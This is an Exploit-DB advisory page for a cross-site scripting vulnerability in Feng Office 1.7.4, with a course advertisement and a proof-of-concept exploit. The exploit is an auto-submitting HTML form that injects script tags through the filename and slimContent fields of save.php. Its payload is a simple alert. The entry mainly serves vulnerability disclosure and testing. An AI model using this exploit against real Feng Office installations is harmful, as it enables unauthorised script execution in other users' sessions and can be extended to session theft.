Feng Office 1.7.4 - Cross-Site Scripting

EDB-ID:

35042

CVE:

N/A




Platform:

PHP

Date:

2014-10-23


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/47049/info

<html> 
<body onload="document.forms[0].submit()"> 
<form method="POST" action="http://localhost/feng_community/public/assets/javascript/slimey/save.php"> 
<input type="hidden" name="filename" value=""><script>alert(0)</script>" /> 
<input type="hidden" name="slimContent" value="</textarea><script>alert(0)</script>" /> 
</form> 
</body> 
</html>